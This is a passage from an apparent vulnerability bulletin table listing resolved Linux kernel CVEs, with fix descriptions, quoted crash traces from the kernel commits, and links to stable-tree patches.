https://git.kernel.org/stable/c/523313881f0aa5cbbdb548ce575b6e58b202bd76 https://git.kernel.org/stable/c/eea4c860c3b366369eff0489d94ee4f0571d467d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: broadcom: bcm4908_enet: update TX stats after actual transmission Queueing packets doesn't guarantee their transmission. Update TX stats after hardware confirms consuming submitted data. This also fixes a possible race and NULL dereference. bcm4908_enet_start_xmit() could try to access skb after freeing it in the bcm4908_enet_poll_tx(). | 2025-12-30 | not yet calculated | CVE-2022-50877 | https://git.kernel.org/stable/c/c9589e18a60c55c76772a38117ef9a16b942e56b https://git.kernel.org/stable/c/2adedc80faec243ede55355e57142110d6f46e08 https://git.kernel.org/stable/c/ef3556ee16c68735ec69bd08df41d1cd83b14ad3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpu: lontium-lt9611: Fix NULL pointer dereference in lt9611_connector_init() A NULL check for bridge->encoder shows that it may be NULL, but it has already been dereferenced on all paths leading to the check. 812 if (!bridge->encoder) { Dereference the pointer bridge->encoder. 810 drm_connector_attach_encoder(&lt9611->connector, bridge->encoder); | 2025-12-30 | not yet calculated | CVE-2022-50878 | https://git.kernel.org/stable/c/3959e8faf8bf6bea619e8856c736db64e6eced37 https://git.kernel.org/stable/c/a29f7427041a943484f916157c43c46d3bbf25d4 https://git.kernel.org/stable/c/b2e4323e0020213f44dca6ffc815d66aef39f6f6 https://git.kernel.org/stable/c/912f84e15e94ab87f5a7156aa1870090373d8304 https://git.kernel.org/stable/c/ef8886f321c5dab8124b9153d25afa2a71d05323 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: objtool: Fix SEGFAULT find_insn() will return NULL in case of failure. Check insn in order to avoid a kernel Oops for NULL pointer dereference. | 2025-12-30 | not yet calculated | CVE-2022-50879 | https://git.kernel.org/stable/c/418ef921cce2d7415fab7e3e93529227f239e4bb https://git.kernel.org/stable/c/0af0e115ff59d638f45416a004cdd8edb38db40c https://git.kernel.org/stable/c/23a249b1185cdd5bfb6971d1608ba49e589f2288 https://git.kernel.org/stable/c/38b9415abbd703438ebbc6fb74990bd0fbddc5b9 https://git.kernel.org/stable/c/fcee8a2d4db404a93e690d79e7273b6ef9d33575 https://git.kernel.org/stable/c/efb11fdb3e1a9f694fa12b70b21e69e55ec59c36 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath10k: add peer map clean up for peer delete in ath10k_sta_state() When peer delete failed in a disconnect operation, a use-after-free was detected by KFENCE in the log below. It is because for each vdev_id and address, it has only one struct ath10k_peer, which is allocated in ath10k_peer_map_event(). When connected to an AP, it has more than one HTT_T2H_MSG_TYPE_PEER_MAP reported from firmware, then multiple elements of the array peer_map of struct ath10k will be set to the same ath10k_peer in ath10k_peer_map_event(). When peer delete failed in ath10k_sta_state(), the ath10k_peer will be freed for the 1st peer id in array peer_map of struct ath10k, and then a use-after-free happened for the 2nd peer id because they map to the same ath10k_peer. Clean up all peers in array peer_map for the ath10k_peer, and the use-after-free disappeared. peer map event log: [ 306.911021] wlan0: authenticate with b0:2a:43:e6:75:0e [ 306.957187] ath10k_pci 0000:01:00.0: mac vdev 0 peer create b0:2a:43:e6:75:0e (new sta) sta 1 / 32 peer 1 / 33 [ 306.957395] ath10k_pci 0000:01:00.0: htt peer map vdev 0 peer b0:2a:43:e6:75:0e id 246 [ 306.957404] ath10k_pci 0000:01:00.0: htt peer map vdev 0 peer b0:2a:43:e6:75:0e id 198 [ 306.986924] ath10k_pci 0000:01:00.0: htt peer map vdev 0 peer b0:2a:43:e6:75:0e id 166 peer unmap event log: [ 435.715691] wlan0: deauthenticating from b0:2a:43:e6:75:0e by local choice (Reason: 3=DEAUTH_LEAVING) [ 435.716802] ath10k_pci 0000:01:00.0: mac vdev 0 peer delete b0:2a:43:e6:75:0e sta ffff990e0e9c2b50 (sta gone) [ 435.717177] ath10k_pci 0000:01:00.0: htt peer unmap vdev 0 peer b0:2a:43:e6:75:0e id 246 [ 435.717186] ath10k_pci 0000:01:00.0: htt peer unmap vdev 0 peer b0:2a:43:e6:75:0e id 198 [ 435.717193] ath10k_pci 0000:01:00.0: htt peer unmap vdev 0 peer b0:2a:43:e6:75:0e id 166 use-after-free log: [21705.888627] wlan0: deauthenticating from d0:76:8f:82:be:75 by local choice (Reason: 3=DEAUTH_LEAVING) [21713.799910] ath10k_pci 0000:01:00.0: failed to delete peer d0:76:8f:82:be:75 for vdev 0: -110 [21713.799925] ath10k_pci 0000:01:00.0: found sta peer d0:76:8f:82:be:75 (ptr 0000000000000000 id 102) entry on vdev 0 after it was supposedly removed [21713.799968] ================================================================== [21713.799991] BUG: KFENCE: use-after-free read in ath10k_sta_state+0x265/0xb8a [ath10k_core] [21713.799991] [21713.799997] Use-after-free read at 0x00000000abe1c75e (in kfence-#69): [21713.800010] ath10k_sta_state+0x265/0xb8a [ath10k_core] [21713.800041] drv_sta_state+0x115/0x677 [mac80211] [21713.800059] __sta_info_destroy_part2+0xb1/0x133 [mac80211] [21713.800076] __sta_info_flush+0x11d/0x162 [mac80211] [21713.800093] ieee80211_set_disassoc+0x12d/0x2f4 [mac80211] [21713.800110] ieee80211_mgd_deauth+0x26c/0x29b [mac80211] [21713.800137] cfg80211_mlme_deauth+0x13f/0x1bb [cfg80211] [21713.800153] nl80211_deauthenticate+0xf8/0x121 [cfg80211] [21713.800161] genl_rcv_msg+0x38e/0x3be [21713.800166] netlink_rcv_skb+0x89/0xf7 [21713.800171] genl_rcv+0x28/0x36 [21713.800176] netlink_unicast+0x179/0x24b [21713.800181] netlink_sendmsg+0x3a0/0x40e [21713.800187] sock_sendmsg+0x72/0x76 [21713.800192] ____sys_sendmsg+0x16d/0x1e3 [21713.800196] ___sys_sendmsg+0x95/0xd1 [21713.800200] __sys_sendmsg+0x85/0xbf [21713.800205] do_syscall_64+0x43/0x55 [21713.800210] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [21713.800213] [21713.800219] kfence-#69: 0x000000009149b0d5-0x000000004c0697fb, size=1064, cache=kmalloc-2k [21713.800219] [21713.800224] allocated by task 13 on cpu 0 at 21705.501373s: [21713.800241] ath10k_peer_map_event+0x7e/0x154 [ath10k_core] [21713.800254] ath10k_htt_t2h_msg_handler+0x586/0x1039 [ath10k_core] [21713.800265] ath10k_htt_htc_t2h_msg_handler+0x12/0x28 [ath10k_core] [21713.800277] ath10k_htc_rx_completion_handler+0x14c/0x1b5 [ath10k_core] [21713.800283] ath10k_pci_process_rx_cb+0x195/0x1d ---truncated--- | 2025-12-30 | not yet calculated | CVE-2022-50880 | https://git.kernel.org/stable/c/15604ab67179ae27ea3c7fb24b6df32b143257c4 https://git.kernel.org/stable/c/2d6259715c9597a6cfa25db8911683eb0073b1c6 https://git.kernel.org/stable/c/f12fc305c127bd07bb50373e29c6037696f916a8 https://git.kernel.org/stable/c/4494ec1c0bb850eaa80fed98e5b041d961011d3e https://git.kernel.org/stable/c/08faf07717be0c88b02b5aa45aad2225dfcdd2dc https://git.kernel.org/stable/c/54a3201f3c1ff813523937da78b5fa7649dbab71 https://git.kernel.org/stable/c/2bf916418d2141b810c40812433ab4ecfd3c2934 https://git.kernel.org/stable/c/38245f2d62cd4d1f38a763a7b4045ab4565b30a0 https://git.kernel.org/stable/c/f020d9570a04df0762a2ac5c50cf1d8c511c9164 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: Fix use-after-free in ath9k_hif_usb_disconnect() This patch fixes a use-after-free in ath9k that occurs in ath9k_hif_usb_disconnect() when ath9k_destroy_wmi() is trying to access 'drv_priv' that has already been freed by ieee80211_free_hw(), called by ath9k_htc_hw_deinit(). The patch moves ath9k_destroy_wmi() before ieee80211_free_hw(). Note that urbs from the driver should be killed before freeing 'wmi' with ath9k_destroy_wmi() as their callbacks will access 'wmi'. Found by a modified version of syzkaller. ================================================================== BUG: KASAN: use-after-free in ath9k_destroy_wmi+0x38/0x40 Read of size 8 at addr ffff8881069132a0 by task kworker/0:1/7 CPU: 0 PID: 7 Comm: kworker/0:1 Tainted: G O 5.14.0+ #131 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.1-0-ga5cab58e9a3f-prebuilt.qemu.org 04/01/2014 Workqueue: usb_hub_wq hub_event Call Trace: dump_stack_lvl+0x8e/0xd1 print_address_description.constprop.0.cold+0x93/0x334 ? ath9k_destroy_wmi+0x38/0x40 ? ath9k_destroy_wmi+0x38/0x40 kasan_report.cold+0x83/0xdf ? ath9k_destroy_wmi+0x38/0x40 ath9k_destroy_wmi+0x38/0x40 ath9k_hif_usb_disconnect+0x329/0x3f0 ? ath9k_hif_usb_suspend+0x120/0x120 ? usb_disable_interface+0xfc/0x180 usb_unbind_interface+0x19b/0x7e0 ? usb_autoresume_device+0x50/0x50 device_release_driver_internal+0x44d/0x520 bus_remove_device+0x2e5/0x5a0 device_del+0x5b2/0xe30 ? __device_link_del+0x370/0x370 ? usb_remove_ep_devs+0x43/0x80 ? remove_intf_ep_devs+0x112/0x1a0 usb_disable_device+0x1e3/0x5a0 usb_disconnect+0x267/0x870 hub_event+0x168d/0x3950 ? rcu_read_lock_sched_held+0xa1/0xd0 ? hub_port_debounce+0x2e0/0x2e0 ? check_irq_usage+0x860/0xf20 ? drain_workqueue+0x281/0x360 ? lock_release+0x640/0x640 ? rcu_read_lock_sched_held+0xa1/0xd0 ? rcu_read_lock_bh_held+0xb0/0xb0 ? lockdep_hardirqs_on_prepare+0x273/0x3e0 process_one_work+0x92b/0x1460 ? pwq_dec_nr_in_flight+0x330/0x330 ? rwlock_bug.part.0+0x90/0x90 worker_thread+0x95/0xe00 ? __kthread_parkme+0x115/0x1e0 ? process_one_work+0x1460/0x1460 kthread+0x3a1/0x480 ? set_kthread_struct+0x120/0x120 ret_from_fork+0x1f/0x30 The buggy address belongs to the page: page:ffffea00041a44c0 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x106913 flags: 0x200000000000000(node=0|zone=2) raw: 0200000000000000 0000000000000000 dead000000000122 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: kasan: bad access detected page_owner tracks the page as freed page last allocated via order 3, migratetype Unmovable, gfp_mask 0x40dc0(GFP_KERNEL|__GFP_COMP|__GFP_ZERO), pid 7, ts 38347963444, free_ts 41399957635 prep_new_page+0x1aa/0x240 get_page_from_freelist+0x159a/0x27c0 __alloc_pages+0x2da/0x6a0 alloc_pages+0xec/0x1e0 kmalloc_order+0x39/0xf0 kmalloc_order_trace+0x19/0x120 __kmalloc+0x308/0x390 wiphy_new_nm+0x6f5/0x1dd0 ieee80211_alloc_hw_nm+0x36d/0x2230 ath9k_htc_probe_device+0x9d/0x1e10 ath9k_htc_hw_init+0x34/0x50 ath9k_hif_usb_firmware_cb+0x25f/0x4e0 request_firmware_work_func+0x131/0x240 process_one_work+0x92b/0x1460 worker_thread+0x95/0xe00 kthread+0x3a1/0x480 page last free stack trace: free_pcp_prepare+0x3d3/0x7f0 free_unref_page+0x1e/0x3d0 device_release+0xa4/0x240 kobject_put+0x186/0x4c0 put_device+0x20/0x30 ath9k_htc_disconnect_device+0x1cf/0x2c0 ath9k_htc_hw_deinit+0x26/0x30 ath9k_hif_usb_disconnect+0x2d9/0x3f0 usb_unbind_interface+0x19b/0x7e0 device_release_driver_internal+0x44d/0x520 bus_remove_device+0x2e5/0x5a0 device_del+0x5b2/0xe30 usb_disable_device+0x1e3/0x5a0 usb_disconnect+0x267/0x870 hub_event+0x168d/0x3950 process_one_work+0x92b/0x1460 Memory state around the buggy address: ffff888106913180: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ffff888106913200: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff >ffff888 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2022-50881 | https://git.kernel.org/stable/c/99ff971b62e5bd5dee65bbe9777375206f5db791 https://git.kernel.org/stable/c/634a5471a6bd774c0d0fa448dfa6ec593e899ec9 https://git.kernel.org/stable/c/1f137c634a8c8faba648574f687805641e62f92e https://git.kernel.org/stable/c/de15e8bbd9eb26fe94a06d0ec7be82dc490eb729 https://git.kernel.org/stable/c/f099c5c9e2ba08a379bd354a82e05ef839ae29ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: uvcvideo: Fix memory leak in uvc_gpio_parse Previously the unit buffer was allocated before checking the IRQ for privacy GPIO. In case of error, the unit buffer was leaked. Allocate the unit buffer after the IRQ to avoid it. Addresses-Coverity-ID: 1474639 ("Resource leak") | 2025-12-30 | not yet calculated | CVE-2022-50882 | https://git.kernel.org/stable/c/6c5da92103bddd1f0c36cb69446ff7cae3043986 https://git.kernel.org/stable/c/deb8f32ae4b10a48c433f2da1b1159521ac24674 https://git.kernel.org/stable/c/4a7ae8d982a89b3b43b36ec7d62a2e3d06ffa16e https://git.kernel.org/stable/c/f0f078457f18f10696888f8d0e6aba9deb9cde92 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Prevent decl_tag from being referenced in func_proto arg Syzkaller managed to hit another decl_tag issue: btf_func_proto_check kernel/bpf/btf.c:4506 [inline] btf_check_all_types kernel/bpf/btf.c:4734 [inline] btf_parse_type_sec+0x1175/0x1980 kernel/bpf/btf.c:4763 btf_parse kernel/bpf/btf.c:5042 [inline] btf_new_fd+0x65a/0xb00 kernel/bpf/btf.c:6709 bpf_btf_load+0x6f/0x90 kernel/bpf/syscall.c:4342 __sys_bpf+0x50a/0x6c0 kernel/bpf/syscall.c:5034 __do_sys_bpf kernel/bpf/syscall.c:5093 [inline] __se_sys_bpf kernel/bpf/syscall.c:5091 [inline] __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5091 do_syscall_64+0x54/0x70 arch/x86/entry/common.c:48 This seems similar to commit ea68376c8bed ("bpf: prevent decl_tag from being referenced in func_proto") but for the argument. | 2025-12-30 | not yet calculated | CVE-2022-50883 | https://git.kernel.org/stable/c/3f3d54962a032581996edda8e6bcbf7a30371234 https://git.kernel.org/stable/c/e6d276dcc9204f95632580c43d66c52ca502d7ec https://git.kernel.org/stable/c/f17472d4599697d701aa239b4c475a506bccfd19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: Prevent drm_copy_field() to attempt copying a NULL pointer There are some struct drm_driver fields that are required by drivers since drm_copy_field() attempts to copy them to user-space via DRM_IOCTL_VERSION. But it can be possible that a driver has a bug and did not set some of the fields, which leads to drm_copy_field() attempting to copy a NULL pointer: [ +10.395966] Unable to handle kernel access to user memory outside uaccess routines at virtual address 0000000000000000 [ +0.010955] Mem abort info: [ +0.002835] ESR = 0x0000000096000004 [ +0.003872] EC = 0x25: DABT (current EL), IL = 32 bits [ +0.005395] SET = 0, FnV = 0 [ +0.003113] EA = 0, S1PTW = 0 [ +0.003182] FSC = 0x04: level 0 translation fault [ +0.004964] Data abort info: [ +0.002919] ISV = 0, ISS = 0x00000004 [ +0.003886] CM = 0, WnR = 0 [ +0.003040] user pgtable: 4k pages, 48-bit VAs, pgdp=0000000115dad000 [ +0.006536] [0000000000000000] pgd=0000000000000000, p4d=0000000000000000 [ +0.006925] Internal error: Oops: 96000004 [#1] SMP ... [ +0.011113] pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ +0.007061] pc : __pi_strlen+0x14/0x150 [ +0.003895] lr : drm_copy_field+0x30/0x1a4 [ +0.004156] sp : ffff8000094b3a50 [ +0.003355] x29: ffff8000094b3a50 x28: ffff8000094b3b70 x27: 0000000000000040 [ +0.007242] x26: ffff443743c2ba00 x25: 0000000000000000 x24: 0000000000000040 [ +0.007243] x23: ffff443743c2ba00 x22: ffff8000094b3b70 x21: 0000000000000000 [ +0.007241] x20: 0000000000000000 x19: ffff8000094b3b90 x18: 0000000000000000 [ +0.007241] x17: 0000000000000000 x16: 0000000000000000 x15: 0000aaab14b9af40 [ +0.007241] x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000 [ +0.007239] x11: 0000000000000000 x10: 0000000000000000 x9 : ffffa524ad67d4d8 [ +0.007242] x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : 6c6e6263606e7141 [ +0.007239] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 [ +0.007241] x2 : 0000000000000000 x1 : ffff8000094b3b90 x0 : 0000000000000000 [ +0.007240] Call trace: [ +0.002475] __pi_strlen+0x14/0x150 [ +0.003537] drm_version+0x84/0xac [ +0.003448] drm_ioctl_kernel+0xa8/0x16c [ +0.003975] drm_ioctl+0x270/0x580 [ +0.003448] __arm64_sys_ioctl+0xb8/0xfc [ +0.003978] invoke_syscall+0x78/0x100 [ +0.003799] el0_svc_common.constprop.0+0x4c/0xf4 [ +0.004767] do_el0_svc+0x38/0x4c [ +0.003357] el0_svc+0x34/0x100 [ +0.003185] el0t_64_sync_handler+0x11c/0x150 [ +0.004418] el0t_64_sync+0x190/0x194 [ +0.003716] Code: 92402c04 b200c3e8 f13fc09f 5400088c (a9400c02) [ +0.006180] ---[ end trace 0000000000000000 ]--- | 2025-12-30 | not yet calculated | CVE-2022-50884 | https://git.kernel.org/stable/c/d213914386a0ede76a4549b41de30192fb92c595 https://git.kernel.org/stable/c/ee9885cd936aad88f84d0cf90bf9a70e83e42a97 https://git.kernel.org/stable/c/8052612b9d08048ebbebcb572894670b4ac07d2f https://git.kernel.org/stable/c/cdde55f97298e5bb9af6d41c9303a3ec545a370e https://git.kernel.org/stable/c/c28a8082b25ce4ec94999e10a30c50d20bd44a25 https://git.kernel.org/stable/c/ca163e389f0ae096a4e1e19f0a95e60ed80b4e31 https://git.kernel.org/stable/c/2d6708ea5c2033ff53267feff1876a717689989f https://git.kernel.org/stable/c/6cf5e9356b2d856403ee480f987f3ea64dbf8d8c https://git.kernel.org/stable/c/f6ee30407e883042482ad4ad30da5eaba47872ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix NULL-ptr-deref in rxe_qp_do_cleanup() when socket create failed There is a null-ptr-deref when mount.cifs over rdma: BUG: KASAN: null-ptr-deref in rxe_qp_do_cleanup+0x2f3/0x360 [rdma_rxe] Read of size 8 at addr 0000000000000018 by task mount.cifs/3046 CPU: 2 PID: 3046 Comm: mount.cifs Not tainted 6.1.0-rc5+ #62 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc3 Call Trace: <TASK> dump_stack_lvl+0x34/0x44 kasan_report+0xad/0x130 rxe_qp_do_cleanup+0x2f3/0x360 [rdma_rxe] execute_in_process_context+0x25/0x90 __rxe_cleanup+0x101/0x1d0 [rdma_rxe] rxe_create_qp+0x16a/0x180 [rdma_rxe] create_qp.part.0+0x27d/0x340 ib_create_qp_kernel+0x73/0x160 rdma_create_qp+0x100/0x230 _smbd_get_connection+0x752/0x20f0 smbd_get_connection+0x21/0x40 cifs_get_tcp_session+0x8ef/0xda0 mount_get_conns+0x60/0x750 cifs_mount+0x103/0xd00 cifs_smb3_do_mount+0x1dd/0xcb0 smb3_get_tree+0x1d5/0x300 vfs_get_tree+0x41/0xf0 path_mount+0x9b3/0xdd0 __x64_sys_mount+0x190/0x1d0 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 The root cause of the issue is that the socket create failed in rxe_qp_init_req(). So move the reset in rxe_qp_do_cleanup() after the NULL ptr check. | 2025-12-30 | not yet calculated | CVE-2022-50885 | https://git.kernel.org/stable/c/ee24de095569935eba600f7735e8e8ddea5b418e https://git.kernel.org/stable/c/7340ca9f782be6fbe3f64a134dc112772764f766 https://git.kernel.org/stable/c/bd7106a6004f1077a365ca7f5a99c7a708e20714 https://git.kernel.org/stable/c/6bb5a62bfd624039b05157745c234068508393a9 https://git.kernel.org/stable/c/f64f08b9e6fb305a25dd75329e06ae342b9ce336 https://git.kernel.org/stable/c/5b924632d84a60bc0c7fe6e9bbbce99d03908957 https://git.kernel.org/stable/c/821f9a18210f6b9fd6792471714c799607b25db4 https://git.kernel.org/stable/c/f67376d801499f4fa0838c18c1efcad8840e550d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: toshsd: fix return value check of mmc_add_host() mmc_add_host() may return an error; if we ignore its return value, the memory allocated in mmc_alloc_host() will be leaked and it will lead to a kernel crash because of deleting a not-added device in the remove path. So fix this by checking the return value and going to the error path, which will call mmc_free_host(); besides, free_irq() also needs to be called. | 2025-12-30 | not yet calculated | CVE-2022-50886 | https://git.kernel.org/stable/c/34ae492f8d172f0bd193c24cad588b35419ea47a https://git.kernel.org/stable/c/3329e7b7132ca727263fb0ee214cf52cc6dcaaad https://git.kernel.org/stable/c/4f6cb1c685f9e20a4a9fa565e442f5af4dad70ff https://git.kernel.org/stable/c/3dbb69a0242c31ea4c9eee22b1c41b515fe509a0 https://git.kernel.org/stable/c/aabbedcb6c9a72d12d35dc672e83f0c8064d8a61 https://git.kernel.org/stable/c/6444079767b68b1fbed0e7668081146e80dcb719 https://git.kernel.org/stable/c/647e370dd0ef7e212d8d014bda748e461eab2e8c https://git.kernel.org/stable/c/bfd77b194c94aefbde4efc30ddf8607dd9244672 https://git.kernel.org/stable/c/f670744a316ea983113a65313dcd387b5a992444 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: fix unbalanced of node refcount in regulator_dev_lookup() I got the following report: OF: ERROR: memory leak, expected refcount 1 instead of 2, of_node_get()/of_node_put() unbalanced - destroy cset entry: attach overlay node /i2c/pmic@62/regulators/exten In of_get_regulator(), the node is returned from of_parse_phandle() with refcount incremented; after using it, of_node_put() needs to be called. | 2025-12-30 | not yet calculated | CVE-2022-50887 | https://git.kernel.org/stable/c/0e88505ac0a6ae97746bcdbd4b042ee9f20455ae https://git.kernel.org/stable/c/4dfcf5087db9a34a300d6b99009232d4537c3e6a https://git.kernel.org/stable/c/3ac888db0f67813d91373a9a61c840f815cd4ec9 https://git.kernel.org/stable/c/d39937f8de641c44a337cec4a2e5d3e8add20a7d https://git.kernel.org/stable/c/f48c474efe05cf9ce5e535b5e0ddd710e963936c https://git.kernel.org/stable/c/cda1895f3b7f324ece1614308a815a3994983b97 https://git.kernel.org/stable/c/2b93c58adddd98812ad928bbc2063038f3df1ffd https://git.kernel.org/stable/c/2f98469c3141f8e42ba11075a273fb795bbad57f https://git.kernel.org/stable/c/f2b41b748c19962b82709d9f23c6b2b0ce9d2f91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: remoteproc: qcom: q6v5: Fix potential null-ptr-deref in q6v5_wcss_init_mmio() q6v5_wcss_init_mmio() will call platform_get_resource_byname(), which may fail and return NULL. devm_ioremap() will use res->start as input, which may cause a null-ptr-deref. Check the return value of platform_get_resource_byname() to avoid the null-ptr-deref. | 2025-12-30 | not yet calculated | CVE-2022-50888 | https://git.kernel.org/stable/c/098ebb9089c4eedea09333f912d105fa63377496 https://git.kernel.org/stable/c/3afa88ae9911b65702a3aca9d92ea23fe496e56f https://git.kernel.org/stable/c/0903a87490a9ed456ac765a84dcc484c1ee42c32 https://git.kernel.org/stable/c/f360e2b275efbb745ba0af8b47d9ef44221be586 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm integrity: Fix UAF in dm_integrity_dtr() dm-integrity also has the same UAF problem when dm_resume() and dm_destroy() are concurrent. Therefore, cancel the timer again in dm_integrity_dtr(). | 2025-12-30 | not yet calculated | CVE-2022-50889 | https://git.kernel.org/stable/c/792e51aac376cfb5bd527c2a30826223b82dd177 https://git.kernel.org/stable/c/a506b5c92757b034034ef683e667bffc456c600b https://git.kernel.org/stable/c/9215b25f2e105032114e9b92c9783a2a84ee8af9 https://git.kernel.org/stable/c/9f8e1e54a3a424c6c4fb8742e094789d3ec91e42 https://git.kernel.org/stable/c/b6c93cd61afab061d80cc842333abca97b289774 https://git.kernel.org/stable/c/f50cb2cbabd6c4a60add93d72451728f86e4791c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix possible memory leak in smb2_lock() argv needs to be freed when setup_async_work fails or when the current process is woken up. | 2025-12-30 | not yet calculated | CVE-2023-54162 | https://git.kernel.org/stable/c/bfe8372ef2dbdce97f13b21d76e2080ddeef5a79 https://git.kernel.org/stable/c/6bf555ed8938444466c3d7f3252eb874a518f293 https://git.kernel.org/stable/c/11d38f8a0c19763e34d2093b5ecb640e012cb2d2 https://git.kernel.org/stable/c/d3ca9f7aeba793d74361d88a8800b2f205c9236b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: ISO: fix iso_conn related locking and validity issues sk->sk_state indicates whether iso_pi(sk)->conn is valid. Operations that check/update sk_state and access conn should hold lock_sock, otherwise they can race. The order of taking locks is hci_dev_lock > lock_sock > iso_conn_lock, which is how it is in connect/disconnect_cfm -> iso_conn_del -> iso_chan_del. Fix locking in iso_connect_cis/bis and sendmsg/recvmsg to take lock_sock around updating sk_state and conn. iso_conn_del must not occur during iso_connect_cis/bis, as it frees the iso_conn. Hold hdev->lock longer to prevent that. This should not reintroduce the issue fixed in commit 241f51931c35 ("Bluetooth: ISO: Avoid circular locking dependency"), since we acquire locks in order. We retain the fix in iso_sock_connect to release lock_sock before iso_connect_* acquires hdev->lock. Similarly for commit 6a5ad251b7cd ("Bluetooth: ISO: Fix possible circular locking dependency"). We retain the fix in iso_conn_ready to not acquire iso_conn_lock before lock_sock. iso_conn_add shall return iso_conn with valid hcon. Make it so also when reusing an old CIS connection waiting for disconnect timeout (see __iso_sock_close where conn->hcon is set to NULL). Trace with iso_conn_del after iso_chan_add in iso_connect_cis: =============================================================== iso_sock_create:771: sock 00000000be9b69b7 iso_sock_init:693: sk 000000004dff667e iso_sock_bind:827: sk 000000004dff667e 70:1a:b8:98:ff:a2 type 1 iso_sock_setsockopt:1289: sk 000000004dff667e iso_sock_setsockopt:1289: sk 000000004dff667e iso_sock_setsockopt:1289: sk 000000004dff667e iso_sock_connect:875: sk 000000004dff667e iso_connect_cis:353: 70:1a:b8:98:ff:a2 -> 28:3d:c2:4a:7e:da hci_get_route:1199: 70:1a:b8:98:ff:a2 -> 28:3d:c2:4a:7e:da hci_conn_add:1005: hci0 dst 28:3d:c2:4a:7e:da iso_conn_add:140: hcon 000000007b65d182 conn 00000000daf8625e __iso_chan_add:214: conn 00000000daf8625e iso_connect_cfm:1700: hcon 000000007b65d182 bdaddr 28:3d:c2:4a:7e:da status 12 iso_conn_del:187: hcon 000000007b65d182 conn 00000000daf8625e, err 16 iso_sock_clear_timer:117: sock 000000004dff667e state 3 <Note: sk_state is BT_BOUND (3), so iso_connect_cis is still running at this point> iso_chan_del:153: sk 000000004dff667e, conn 00000000daf8625e, err 16 hci_conn_del:1151: hci0 hcon 000000007b65d182 handle 65535 hci_conn_unlink:1102: hci0: hcon 000000007b65d182 hci_chan_list_flush:2780: hcon 000000007b65d182 iso_sock_getsockopt:1376: sk 000000004dff667e iso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e iso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e iso_sock_getsockopt:1376: sk 000000004dff667e iso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e iso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e iso_sock_shutdown:1434: sock 00000000be9b69b7, sk 000000004dff667e, how 1 __iso_sock_close:632: sk 000000004dff667e state 5 socket 00000000be9b69b7 <Note: sk_state is BT_CONNECT (5), even though iso_chan_del sets BT_CLOSED (6). Only iso_connect_cis sets it to BT_CONNECT, so it must be that iso_chan_del occurred between iso_chan_add and end of iso_connect_cis.> BUG: kernel NULL pointer dereference, address: 0000000000000000 PGD 8000000006467067 P4D 8000000006467067 PUD 3f5f067 PMD 0 Oops: 0000 [#1] PREEMPT SMP PTI Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-1.fc38 04/01/2014 RIP: 0010:__iso_sock_close (net/bluetooth/iso.c:664) bluetooth =============================================================== Trace with iso_conn_del before iso_chan_add in iso_connect_cis: =============================================================== iso_connect_cis:356: 70:1a:b8:98:ff:a2 -> 28:3d:c2:4a:7e:da ... iso_conn_add:140: hcon 0000000093bc551f conn 00000000768ae504 hci_dev_put:1487: hci0 orig refcnt 21 hci_event_packet:7607: hci0: e ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54164 | https://git.kernel.org/stable/c/e969bfed84c1f88dc722a678ee08488e86f0ec1a https://git.kernel.org/stable/c/88ad50f2b843a510bd7c922c0a4e2484aff9d645 https://git.kernel.org/stable/c/d40ae85ee62e3666f45bc61864b22121346f88ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: zsmalloc: move LRU update from zs_map_object() to zs_malloc() Under memory pressure, we sometimes observe the following crash: [ 5694.832838] ------------[ cut here ]------------ [ 5694.842093] list_del corruption, ffff888014b6a448->next is LIST_POISON1 (dead000000000100) [ 5694.858677] WARNING: CPU: 33 PID: 418824 at lib/list_debug.c:47 __list_del_entry_valid+0x42/0x80 [ 5694.961820] CPU: 33 PID: 418824 Comm: fuse_counters.s Kdump: loaded Tainted: G S 5.19.0-0_fbk3_rc3_hoangnhatpzsdynshrv41_10870_g85a9558a25de #1 [ 5694.990194] Hardware name: Wiwynn Twin Lakes MP/Twin Lakes Passive MP, BIOS YMM16 05/24/2021 [ 5695.007072] RIP: 0010:__list_del_entry_valid+0x42/0x80 [ 5695.017351] Code: 08 48 83 c2 22 48 39 d0 74 24 48 8b 10 48 39 f2 75 2c 48 8b 51 08 b0 01 48 39 f2 75 34 c3 48 c7 c7 55 d7 78 82 e8 4e 45 3b 00 <0f> 